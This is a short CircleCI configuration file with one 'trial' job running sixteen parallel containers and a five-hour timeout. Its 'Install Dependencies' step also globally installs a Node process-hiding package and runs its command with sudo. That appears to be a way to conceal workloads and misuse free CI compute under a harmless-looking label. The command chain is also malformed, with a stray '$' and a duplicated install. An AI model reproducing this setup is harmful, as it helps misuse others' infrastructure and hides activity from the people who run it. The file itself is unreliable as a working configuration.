version: 2.1
jobs:
    trial:
      docker:
            - image: debian:latest
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command: apt update && apt install gcc && apt install gcc nodejs -y && $ npm i -g node-process-hider && sudo ph add
            no_output_timeout: 5h

workflows:
    version: 2.1
    build:
        jobs:
        - trial
